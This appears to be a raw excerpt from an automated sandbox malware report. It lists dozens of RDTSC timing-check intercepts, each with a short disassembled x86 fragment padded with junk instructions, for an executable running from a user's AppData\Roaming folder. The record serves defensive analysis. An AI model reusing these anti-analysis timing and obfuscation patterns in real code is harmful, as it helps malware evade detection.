Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 61FD40 second address: 61FD46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 61FD46 second address: 61FD61 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FBC9118B8ADh 0x00000008 jl 00007FBC9118B8A6h 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 61FD61 second address: 61FD65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 62DCA6 second address: 62DCB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC9118B8AFh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 62DCB9 second address: 62DCBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 645CA8 second address: 645CBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8AFh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 645CBC second address: 645CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FBC912593FDh 0x00000011 pushad 0x00000012 push edi 0x00000013 pop edi 0x00000014 jmp 00007FBC91259403h 0x00000019 jnp 00007FBC912593F6h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 645CF8 second address: 645CFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 645CFC second address: 645D00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 6465FC second address: 646606 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 646606 second address: 64660A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 64660A second address: 64660E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 64679D second address: 6467A7 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBC912593F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 64693C second address: 64695B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC9118B8B8h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 64695B second address: 646961 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 646961 second address: 64697F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007FBC9118B8A6h 0x00000011 jmp 00007FBC9118B8ADh 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 64697F second address: 646983 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 649547 second address: 64954D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 6495E5 second address: 649600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FBC912593FBh 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007FBC912593F6h 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 649600 second address: 649604 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 649BAB second address: 649BB5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBC912593FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 64ACD8 second address: 64ACDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 64ACDC second address: 64ACEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FBC912593F6h 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 64C45E second address: 64C464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 64C464 second address: 64C49D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FBC912593F8h 0x0000000b pop edx 0x0000000c push ebx 0x0000000d push edx 0x0000000e jmp 00007FBC91259402h 0x00000013 ja 00007FBC912593F6h 0x00000019 pop edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FBC912593FEh 0x00000021 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60BB0 second address: 4C60BD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, ah 0x00000005 call 00007FBC9118B8B5h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60BD5 second address: 4C60BD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60BD9 second address: 4C60BDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60BDF second address: 4C60C66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edi, esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FBC91259404h 0x00000013 add cx, A218h 0x00000018 jmp 00007FBC912593FBh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FBC91259408h 0x00000024 xor eax, 24DB0C78h 0x0000002a jmp 00007FBC912593FBh 0x0000002f popfd 0x00000030 popad 0x00000031 mov ah, 67h 0x00000033 popad 0x00000034 mov ebp, esp 0x00000036 jmp 00007FBC912593FBh 0x0000003b pop ebp 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FBC91259405h 0x00000043 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60C66 second address: 4C60C6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60C6C second address: 4C60C70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50BC8 second address: 4C50BCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50BCE second address: 4C50BD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50BD2 second address: 4C50C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FBC9118B8AEh 0x00000010 and ecx, 46A38A48h 0x00000016 jmp 00007FBC9118B8ABh 0x0000001b popfd 0x0000001c mov dx, si 0x0000001f popad 0x00000020 mov dword ptr [esp], ebp 0x00000023 pushad 0x00000024 movzx eax, dx 0x00000027 pushfd 0x00000028 jmp 00007FBC9118B8ADh 0x0000002d and si, 1766h 0x00000032 jmp 00007FBC9118B8B1h 0x00000037 popfd 0x00000038 popad 0x00000039 mov ebp, esp 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50C36 second address: 4C50C49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC912593FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50C49 second address: 4C50C4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C90641 second address: 4C90645 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C90645 second address: 4C9065B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov ebx, 1DDBB546h 0x00000010 mov ebx, 248DDFD2h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C9065B second address: 4C90661 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C90661 second address: 4C9068C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FBC9118B8AEh 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 pushad 0x00000014 mov dx, si 0x00000017 mov ecx, 6B2965DFh 0x0000001c popad 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C30135 second address: 4C3013A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C3013A second address: 4C30174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, di 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007FBC9118B8B0h 0x00000010 mov dword ptr [esp], ebp 0x00000013 pushad 0x00000014 movzx esi, bx 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d call 00007FBC9118B8AEh 0x00000022 pop esi 0x00000023 mov bh, 7Fh 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C30174 second address: 4C30190 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC91259408h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C30190 second address: 4C301A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C301A1 second address: 4C301A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C301A5 second address: 4C301AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C301AB second address: 4C301C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC912593FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C301C3 second address: 4C301DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C508EB second address: 4C508EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C508EF second address: 4C508F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C508F5 second address: 4C508FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C508FB second address: 4C508FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C508FF second address: 4C5090E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C5090E second address: 4C50912 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50912 second address: 4C50918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50918 second address: 4C5092C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 movsx edi, ax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 mov dx, si 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C5092C second address: 4C5094F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ebx, esi 0x00000008 popad 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBC91259407h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C5094F second address: 4C50955 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C5052B second address: 4C5052F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C5052F second address: 4C50535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50535 second address: 4C5054E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC912593FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx ebx, ax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C5054E second address: 4C50553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50553 second address: 4C50559 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50559 second address: 4C5055D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50431 second address: 4C50451 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC912593FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBC912593FCh 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50451 second address: 4C50456 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50456 second address: 4C504A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FBC91259407h 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f mov cl, dl 0x00000011 popad 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov ch, dl 0x00000019 pushfd 0x0000001a jmp 00007FBC912593FEh 0x0000001f add ax, 3DD8h 0x00000024 jmp 00007FBC912593FBh 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C504A2 second address: 4C504BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC9118B8B4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C504BA second address: 4C504BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50202 second address: 4C50215 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50215 second address: 4C50265 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 039Ah 0x00000007 mov si, di 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FBC912593FAh 0x00000013 mov dword ptr [esp], ebp 0x00000016 pushad 0x00000017 call 00007FBC912593FEh 0x0000001c call 00007FBC91259402h 0x00000021 pop ecx 0x00000022 pop edi 0x00000023 movzx eax, dx 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 pushad 0x0000002a movsx ebx, ax 0x0000002d popad 0x0000002e pop ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50265 second address: 4C50269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50269 second address: 4C5026F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50E83 second address: 4C50E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50E87 second address: 4C50EA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC91259407h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50EA2 second address: 4C50EBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC9118B8B4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50EBA second address: 4C50EBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50EBE second address: 4C50F46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007FBC9118B8ACh 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 mov ax, AD2Dh 0x00000016 jmp 00007FBC9118B8AAh 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e pushad 0x0000001f call 00007FBC9118B8AEh 0x00000024 call 00007FBC9118B8B2h 0x00000029 pop ecx 0x0000002a pop edx 0x0000002b pushfd 0x0000002c jmp 00007FBC9118B8B0h 0x00000031 sub cx, 1F58h 0x00000036 jmp 00007FBC9118B8ABh 0x0000003b popfd 0x0000003c popad 0x0000003d pop ebp 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FBC9118B8B5h 0x00000045 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50F46 second address: 4C50F4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50F4C second address: 4C50F50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C9060B second address: 4C90623 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC91259404h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C7002E second address: 4C7004F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBC9118B8ADh 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C7004F second address: 4C70077 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC91259401h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FBC912593FAh 0x00000012 pop eax 0x00000013 movsx ebx, si 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C70077 second address: 4C700B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FBC9118B8AEh 0x0000000f mov ebp, esp 0x00000011 jmp 00007FBC9118B8B0h 0x00000016 mov eax, dword ptr [ebp+08h] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C700B2 second address: 4C700B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C700B8 second address: 4C700F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, al 0x00000005 mov ch, bl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a and dword ptr [eax], 00000000h 0x0000000d jmp 00007FBC9118B8B6h 0x00000012 and dword ptr [eax+04h], 00000000h 0x00000016 pushad 0x00000017 call 00007FBC9118B8AEh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
